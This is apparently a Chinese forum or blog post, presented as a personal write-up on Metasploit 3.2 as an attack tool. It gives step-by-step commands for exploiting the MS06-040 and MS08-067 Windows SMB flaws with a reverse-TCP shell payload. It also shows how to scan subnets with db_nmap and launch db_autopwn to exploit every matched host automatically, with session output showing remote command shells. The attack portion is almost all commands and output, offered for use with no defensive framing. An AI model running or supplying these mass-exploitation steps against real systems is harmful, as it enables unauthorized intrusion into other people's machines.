Metasploit是一个攻击工具,前一段时间用了一下,感觉很厉害,现在介绍一下心得。
攻击方法:(针对windows 2000 的一个漏洞)
1、use exploit/windows/smb/ms06_040_netapi
2、set PAYLOAD windows/shell_reverse_tcp
3、set RHOST 192.168.0.161
4、set LHOST 192.168.0.160
5、exploit
不过一般的传统攻击方法应该是这样的:
MSF3.0以上的版本都可以自动话检测漏洞了,针对单个服务器检测以及针对单个漏洞的检测都比较简单。
首先是针对单个服务器检测,下面以MSF3.2为实例:
首先下载MSF3.2,官方下载地址为:http://spool.metasploit.com/releases/framework-3.2.exe
这个是WINDOWS下的版本,安装一直按下一步即可,MSF3.2集成了NMAP,直到安装完毕,会提示自动升级,升级完毕MSF3.2会自动运行,如图1:
(图1)
点击WINDOWS,CONSOLE(快捷键是CRTL+O),会出现图2
(图2)
依次输入:
load db_sqlite3
回显:
· Successfully loaded plugin: db_sqlite3
db_create
回显:
· Creating a new database instance...
· Successfully connected to the database
· File: C:/Documents and Settings/Administrator/Application Data/.msf3/sqlite3.db
MSF以SQLITE3数据库为住,到此数据库已经建立:
db_nmap XXX.XXX.XXX.XXX(或者输入域名) PS:如果现实无法找到NMAP的话([-] The nmap executable could not be found),请先关闭MSF3.2,运行桌面上的ZNMAP快捷方式,再打开MSF3.2即可。扫描过程中会弹出NMAP的DOS,大家耐心等待即可。
扫描完毕,如图3
(图3)
然后输入db_autopwn -t -p -e -x –r 即可自动溢出
db_autopwn 下的命令给大家发出来。
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-t Show all matching exploit modules
查看所有匹配的开发模块
-x Select modules based on vulnerability references
选择模块基础上的脆弱性引用
-p Select modules based on open ports
基于开放的端口来选择模块
-e Launch exploits against all matched targets
向所有匹配的目标发射Exploits
-r Use a reverse connect shell
使用反向连接
-b Use a bind shell on a random port
使用绑定壳牌随机端口
-h Display this help text
显示此帮助文本
耐心等待,完毕后输入sessions -l –v 如果出现漏洞,MSF则会提示
msf > sessions -l -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.xxx.xxx:17513 -> 192.168.xxx.1291043 windows/smb/ms06_040_netapi
2 Command shell 192.168.xxx.xxx:5804 -> 192.168.xxx.129:1044 windows/smb/ms08_067_netapi
再输入sessions -i 1
Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:/WINDOWS/system32>
好了,针对单一的入侵已经完毕,下面说下自动攻击某个漏洞,在网上看到过一片类似的帖子,借鉴下别人的成果。以ms08_067漏洞为例,就不带图了。
———————————————————————————————————————
msf > load db_sqlite3
· Successfully loaded plugin: db_sqlite3
Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:
msf > db_create
· The specified database already exists, connecting
· Successfully connected to the database
· File: /root/.msf3/sqlite3.db
To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:
msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:
msf > db_autopwn -e -p -b -m ms08_067
Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86
msf > sessions -i 1
Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:/WINDOWS/system32>
ps:甚至可以指定选用更多的漏洞插件,比如db_autopwn -e -p -b -m windows,这样是检测所有windows漏洞插件,但是不推荐这样,扫描量会比较大,而且也容易出现问题(比如一台主机多个shell,shell容易死掉),如果实在扫不出任何漏洞才考虑使用这种方式
——————————————————————————————————————
分割线内容为转载内容
PS:需要用到的命令依次是:
load db_sqlite3
db_create
db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24
db_autopwn -e -p -b -m ms08_067
如果想换别的端口和漏洞,仅需更改NMAP后的端口以及MS后的漏洞即可。
奉上国外的一个的漏洞公布网址,供大家学习谈论用:http://www.milw0rm.com/
可是如何在MSF3.2中加入一个Exploits呢?貌似3.2自动升级它的EXPLOITS,但是一个新的如何加入呢?
自动攻击为何不能得出SHELL呢?是漏洞全部封上的缘故还是操作的缘故呢?